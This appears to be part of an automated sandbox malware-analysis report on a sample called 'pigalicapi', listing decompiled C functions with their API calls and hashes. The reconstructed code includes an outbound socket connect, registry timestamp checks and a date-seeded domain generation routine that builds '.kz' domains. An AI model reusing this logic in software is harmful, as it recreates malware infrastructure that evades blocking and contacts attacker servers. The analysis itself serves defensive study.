                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eca186
                                                                                                                                                                                                                                                    0x00eca13a
                                                                                                                                                                                                                                                    0x00eca13d
                                                                                                                                                                                                                                                    0x00eca13e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eca143
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00ECA09C
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00ECA0C0
                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 00ECA0CD
                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 00ECA121
                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00ECA13E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 530611402-0
                                                                                                                                                                                                                                                    • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                    • Instruction ID: 68988c928c45cadebb865ee8780382619d811121677bfdf1816df1b802c18c84
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14316DB0A0120DABDB14DFA4CA46FEEB7B5AF08318F18565DE5207B2C0D3B29942C752
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                    			E00EC9290() {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                                                                                                                    					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                    0x00ec9296
                                                                                                                                                                                                                                                    0x00ec92b4
                                                                                                                                                                                                                                                    0x00ec92bb
                                                                                                                                                                                                                                                    0x00ec92c8
                                                                                                                                                                                                                                                    0x00ec92c8
                                                                                                                                                                                                                                                    0x00ec92d1

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00EC92A7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00EC92AE
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00EC92C1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                    • Opcode ID: 3d041214a7087ee0bb7206072fa9b12be3e09b6f746e16bd9da0d2d5c38cfcd1
                                                                                                                                                                                                                                                    • Instruction ID: e44a7dd2c447a82e1a745c6cd54b1f745cf7d01ae36f157086e910f9054ec478
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d041214a7087ee0bb7206072fa9b12be3e09b6f746e16bd9da0d2d5c38cfcd1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1E01A74D00308FFCB00EBF1DA4DF8CBB78AB08306F6051A8F909B2250D6765A4ACB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                                    			E00EC7250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                                    				int _v48;
                                                                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                                                    				intOrPtr* _v72;
                                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                                                                    				intOrPtr* _t68;
                                                                                                                                                                                                                                                    				short* _t69;
                                                                                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                                                                                    				intOrPtr* _t91;
                                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                                    				intOrPtr* _t101;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 1;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                    					return _v5;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v24 = E00EC16F0(_a8, _a12);
                                                                                                                                                                                                                                                    					_t58 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    					_v12 = _t58;
                                                                                                                                                                                                                                                    					E00EC7D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                    					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                    					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                    					_v16 = 0x80000001;
                                                                                                                                                                                                                                                    					if(( *0xed435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_v16 = 0x80000002;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                                    					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                    						_v48 = 0x10;
                                                                                                                                                                                                                                                    						_v44 = 0x10;
                                                                                                                                                                                                                                                    						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                    							_v72 =  &_v64;
                                                                                                                                                                                                                                                    							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                    							_t91 = _v72;
                                                                                                                                                                                                                                                    							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                    							_t68 = _t101;
                                                                                                                                                                                                                                                    							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                    							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                    							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                    							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                    							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                    							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                    							_t70 = E00EC9910();
                                                                                                                                                                                                                                                    							asm("cdq");
                                                                                                                                                                                                                                                    							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                    							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                    								_v5 = 0;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						RegCloseKey(_v20);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                    0x00ec7256
                                                                                                                                                                                                                                                    0x00ec725e
                                                                                                                                                                                                                                                    0x00ec73af
                                                                                                                                                                                                                                                    0x00ec73b5
                                                                                                                                                                                                                                                    0x00ec7285
                                                                                                                                                                                                                                                    0x00ec7295
                                                                                                                                                                                                                                                    0x00ec7298
                                                                                                                                                                                                                                                    0x00ec729d
                                                                                                                                                                                                                                                    0x00ec72a8
                                                                                                                                                                                                                                                    0x00ec72bd
                                                                                                                                                                                                                                                    0x00ec72c3
                                                                                                                                                                                                                                                    0x00ec72c6
                                                                                                                                                                                                                                                    0x00ec72d6
                                                                                                                                                                                                                                                    0x00ec72d8
                                                                                                                                                                                                                                                    0x00ec72d8
                                                                                                                                                                                                                                                    0x00ec72df
                                                                                                                                                                                                                                                    0x00ec7301
                                                                                                                                                                                                                                                    0x00ec7307
                                                                                                                                                                                                                                                    0x00ec730e
                                                                                                                                                                                                                                                    0x00ec7331
                                                                                                                                                                                                                                                    0x00ec733c
                                                                                                                                                                                                                                                    0x00ec7343
                                                                                                                                                                                                                                                    0x00ec7349
                                                                                                                                                                                                                                                    0x00ec734c
                                                                                                                                                                                                                                                    0x00ec734f
                                                                                                                                                                                                                                                    0x00ec7353
                                                                                                                                                                                                                                                    0x00ec7358
                                                                                                                                                                                                                                                    0x00ec735e
                                                                                                                                                                                                                                                    0x00ec7364
                                                                                                                                                                                                                                                    0x00ec736a
                                                                                                                                                                                                                                                    0x00ec736f
                                                                                                                                                                                                                                                    0x00ec7374
                                                                                                                                                                                                                                                    0x00ec737a
                                                                                                                                                                                                                                                    0x00ec7380
                                                                                                                                                                                                                                                    0x00ec7383
                                                                                                                                                                                                                                                    0x00ec738b
                                                                                                                                                                                                                                                    0x00ec7393
                                                                                                                                                                                                                                                    0x00ec739f
                                                                                                                                                                                                                                                    0x00ec73a1
                                                                                                                                                                                                                                                    0x00ec73a1
                                                                                                                                                                                                                                                    0x00ec739f
                                                                                                                                                                                                                                                    0x00ec73a9
                                                                                                                                                                                                                                                    0x00ec73a9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec7301

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EC72BD
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,000F003F,00000000), ref: 00EC72F9
                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,00000010), ref: 00EC7329
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00EC7343
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EC73A9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseLocalOpenQueryTimeValuewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852505512-0
                                                                                                                                                                                                                                                    • Opcode ID: a4519fc33d41b12b7fe54df723df58f46a38a6e861ad2aeea05a109532e88128
                                                                                                                                                                                                                                                    • Instruction ID: fd9038b43d39db2745b114572070500a6d8f9b0ce6dd750f788cd1eab08e6a65
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4519fc33d41b12b7fe54df723df58f46a38a6e861ad2aeea05a109532e88128
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94416AB4904208DFDB04CF99C985FAEBBB5BF48300F14855CE845AB291D7769946CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC73C0(long _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                                                                    				char* _t26;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                    					_t24 = _a4;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t24 + 0x10)) != 0) {
                                                                                                                                                                                                                                                    						_v20 = E00EC16F0(_a8, _a12);
                                                                                                                                                                                                                                                    						_t26 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    						_v8 = _t26;
                                                                                                                                                                                                                                                    						E00EC7D20(_t26,  &_v36, 0, 0x10);
                                                                                                                                                                                                                                                    						wsprintfA( &_v36, "%u", _v20);
                                                                                                                                                                                                                                                    						_v12 = 0x80000001;
                                                                                                                                                                                                                                                    						if(( *0xed435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    							_v12 = 0x80000002;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                                    						_t24 = RegOpenKeyExA(_v12, _v8, 0, 0xf003f,  &_v16);
                                                                                                                                                                                                                                                    						if(_t24 == 0) {
                                                                                                                                                                                                                                                    							GetLocalTime( &_v52);
                                                                                                                                                                                                                                                    							RegSetValueExA(_v16,  &_v36, 0, 3,  &_v52, 0x10);
                                                                                                                                                                                                                                                    							return RegCloseKey(_v16);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t24;
                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                    0x00ec73ca
                                                                                                                                                                                                                                                    0x00ec73e4
                                                                                                                                                                                                                                                    0x00ec73eb
                                                                                                                                                                                                                                                    0x00ec7401
                                                                                                                                                                                                                                                    0x00ec7404
                                                                                                                                                                                                                                                    0x00ec7409
                                                                                                                                                                                                                                                    0x00ec7414
                                                                                                                                                                                                                                                    0x00ec7429
                                                                                                                                                                                                                                                    0x00ec7432
                                                                                                                                                                                                                                                    0x00ec7442
                                                                                                                                                                                                                                                    0x00ec7444
                                                                                                                                                                                                                                                    0x00ec7444
                                                                                                                                                                                                                                                    0x00ec744b
                                                                                                                                                                                                                                                    0x00ec7465
                                                                                                                                                                                                                                                    0x00ec746d
                                                                                                                                                                                                                                                    0x00ec7473
                                                                                                                                                                                                                                                    0x00ec748b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec7495
                                                                                                                                                                                                                                                    0x00ec746d
                                                                                                                                                                                                                                                    0x00ec73eb
                                                                                                                                                                                                                                                    0x00ec749e

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00EC7429
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,00000000), ref: 00EC7465
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00EC7473
                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00EC748B
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EC7495
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseLocalOpenTimeValuewsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3926099652-0
                                                                                                                                                                                                                                                    • Opcode ID: fec92b3e52f05c683da238cac65c8a22d830561ac03a3b2612a62a19eb9fef12
                                                                                                                                                                                                                                                    • Instruction ID: 991616dda6bfc0da1abca932aba44b437fcb6118850719b161e50a4c64447ca3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fec92b3e52f05c683da238cac65c8a22d830561ac03a3b2612a62a19eb9fef12
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1218E75910208AFDB14CF95DD49FFE7B78BB48704F04845CF914AA180D7769A45CF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC9650(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                    				int _v24;
                                                                                                                                                                                                                                                    				signed char _v25;
                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                    					while(_v12 < _a8 && _v24 < _a16) {
                                                                                                                                                                                                                                                    						_v25 =  *((intOrPtr*)(_a4 + _v12));
                                                                                                                                                                                                                                                    						E00EC7D20(_a4 + _v12,  &_v20, 0, 8);
                                                                                                                                                                                                                                                    						E00EC9560(_v25 & 0x000000ff,  &_v20, 7);
                                                                                                                                                                                                                                                    						_t58 = _t58 + 0x18;
                                                                                                                                                                                                                                                    						lstrcatA(_a12,  &_v20);
                                                                                                                                                                                                                                                    						_v24 = lstrlenA(_a12);
                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(lstrlenA(_a12) > _a16) {
                                                                                                                                                                                                                                                    						_a12[_a16] = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v8 = lstrlenA(_a12);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                    0x00ec9656
                                                                                                                                                                                                                                                    0x00ec9661
                                                                                                                                                                                                                                                    0x00ec9685
                                                                                                                                                                                                                                                    0x00ec9696
                                                                                                                                                                                                                                                    0x00ec9699
                                                                                                                                                                                                                                                    0x00ec96b1
                                                                                                                                                                                                                                                    0x00ec96bc
                                                                                                                                                                                                                                                    0x00ec96cf
                                                                                                                                                                                                                                                    0x00ec96d4
                                                                                                                                                                                                                                                    0x00ec96df
                                                                                                                                                                                                                                                    0x00ec96ef
                                                                                                                                                                                                                                                    0x00ec96f8
                                                                                                                                                                                                                                                    0x00ec96f8
                                                                                                                                                                                                                                                    0x00ec970a
                                                                                                                                                                                                                                                    0x00ec9712
                                                                                                                                                                                                                                                    0x00ec9712
                                                                                                                                                                                                                                                    0x00ec971f
                                                                                                                                                                                                                                                    0x00ec971f
                                                                                                                                                                                                                                                    0x00ec9728

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC9690
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00EC96DF
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC96E9
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC9701
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC9719
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                                                                                    • Opcode ID: 5040fc51d6414cfa590fc877cb0168e24c7220f6b9230cb419ad6588767c16ac
                                                                                                                                                                                                                                                    • Instruction ID: a7d9aa83de4c21b5557ef116eb60c1230a4c2d33629d2fedd6638e5b2ad5b8df
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5040fc51d6414cfa590fc877cb0168e24c7220f6b9230cb419ad6588767c16ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21216B70800249EFCB04CFA4D989FEE7BB5BF04304F14945DE809A7281D375AA56CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC92E0(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				char _v172;
                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                    					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                    					_t46 = E00EC97E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                    					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                    					_t8 =  &_a12; // 0xec44ef
                                                                                                                                                                                                                                                    					_v12 = _t46 +  *_t8;
                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                    					while(_v32 < _a8) {
                                                                                                                                                                                                                                                    						E00EC7D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                    						_t50 = E00EC8BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                    						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                    						_v40 = _t50;
                                                                                                                                                                                                                                                    						if(_v40 <= 0) {
                                                                                                                                                                                                                                                    							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v12 = _v172;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                    						E00EC9650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                    						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                    						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                    						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                    0x00ec92e9
                                                                                                                                                                                                                                                    0x00ec92f4
                                                                                                                                                                                                                                                    0x00ec9308
                                                                                                                                                                                                                                                    0x00ec931d
                                                                                                                                                                                                                                                    0x00ec9322
                                                                                                                                                                                                                                                    0x00ec9325
                                                                                                                                                                                                                                                    0x00ec9328
                                                                                                                                                                                                                                                    0x00ec932b
                                                                                                                                                                                                                                                    0x00ec933d
                                                                                                                                                                                                                                                    0x00ec9357
                                                                                                                                                                                                                                                    0x00ec9371
                                                                                                                                                                                                                                                    0x00ec9376
                                                                                                                                                                                                                                                    0x00ec9379
                                                                                                                                                                                                                                                    0x00ec9380
                                                                                                                                                                                                                                                    0x00ec9396
                                                                                                                                                                                                                                                    0x00ec9382
                                                                                                                                                                                                                                                    0x00ec9388
                                                                                                                                                                                                                                                    0x00ec9388
                                                                                                                                                                                                                                                    0x00ec93a8
                                                                                                                                                                                                                                                    0x00ec93c4
                                                                                                                                                                                                                                                    0x00ec93c9
                                                                                                                                                                                                                                                    0x00ec93db
                                                                                                                                                                                                                                                    0x00ec93e7
                                                                                                                                                                                                                                                    0x00ec93f0
                                                                                                                                                                                                                                                    0x00ec933a
                                                                                                                                                                                                                                                    0x00ec933a
                                                                                                                                                                                                                                                    0x00ec933d
                                                                                                                                                                                                                                                    0x00ec93fe

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00EC9308
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC8BFF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: GetLastError.KERNEL32 ref: 00EC8C09
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8C38
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00EC8C59
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00EC8C71
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 00EC8C99
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00EC8CC1
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 00EC8CD5
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8CE1
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,.kz), ref: 00EC93DB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                    • String ID: .kz$D
                                                                                                                                                                                                                                                    • API String ID: 2740484991-415060247
                                                                                                                                                                                                                                                    • Opcode ID: 0efe43ac9930b1a411e570d75614489bbb1537286d103692455dbefbee0a40ce
                                                                                                                                                                                                                                                    • Instruction ID: 2b3d9ad5f9ae9b357335c862756e3763e7b3e13a713b7c35b9ce76da4cf84b37
